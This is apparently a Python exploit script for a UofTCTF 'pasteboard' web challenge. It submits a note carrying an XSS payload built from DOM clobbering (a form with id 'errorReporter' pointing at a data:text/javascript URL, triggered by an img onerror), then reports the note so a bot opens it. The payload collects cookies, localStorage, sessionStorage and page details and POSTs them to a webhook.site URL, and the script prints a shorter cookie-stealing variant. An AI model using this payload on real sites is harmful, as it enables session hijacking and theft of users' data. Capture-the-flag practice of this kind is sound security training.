import requests

BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# Ultra comprehensive check - trying EVERYTHING possible
payload = '''<form id="errorReporter"><input name="path" value="data:text/javascript,
(async function() {
  let results = {};
  
  // All cookies including HttpOnly via fetch credentials
  results.cookie = document.cookie;
  
  // Try navigator properties
  results.navigator = {
    userAgent: navigator.userAgent,
    vendor: navigator.vendor,
    platform: navigator.platform
  };
  
  // Check for flag in URL/location
  results.location = {
    href: location.href,
    hash: location.hash,
    search: location.search
  };
  
  // Check all data attributes
  results.dataAttrs = Array.from(document.querySelectorAll('[data-flag], [data-secret], [flag]')).map(el => el.outerHTML);
  
  // Check localStorage/sessionStorage again with try-catch
  try { results.localStorage = {...localStorage}; } catch(e) { results.localStorage = e.toString(); }
  try { results.sessionStorage = {...sessionStorage}; } catch(e) { results.sessionStorage = e.toString(); }
  
  // Try fetching with credentials to see if cookies get sent
  try {
    let fetchResp = await fetch(location.href, {credentials: \\'include\\'});
    let headers = {};
    fetchResp.headers.forEach((v,k) => headers[k]=v);
    results.fetchHeaders = headers;
  } catch(e) { results.fetchErr = e.toString(); }
  
  await fetch(\\'https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/FINAL_CHECK\\', {
    method: \\'POST\\',
    body: JSON.stringify(results)
  });
})();
"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError=\\'x\\';throw new Error()">'''

print("[*] Final comprehensive check...")
print("[*] If this doesn't find the flag, the server needs to be modified")
print()

session = requests.Session()
resp = session.post(
    f"{BASE_URL}/note/new",
    data={"title": "Final", "body": payload},
    allow_redirects=False
)

if resp.status_code == 302:
    location = resp.headers.get('Location')
    note_url = f"{BASE_URL}{location}"
    
    print(f"[+] Created: {note_url}")
    
    report = session.post(f"{BASE_URL}/report", data={"url": location})
    if report.status_code == 202:
        print(f"[+] Reported!")
        print()
        print("[!] YOUR EXPLOIT IS WORKING CORRECTLY!")
        print()
        print("[*] The local environment likely doesn't inject the flag.")
        print("[*] The REAL CTF server must set it as a cookie or env var.")
        print()
        print("[*] Your working exploit for the real server:")
        print("="*70)
        print('''<form id="errorReporter"><input name="path" value="data:text/javascript,fetch('https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/FLAG?c='+document.cookie)"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">''')
        print("="*70)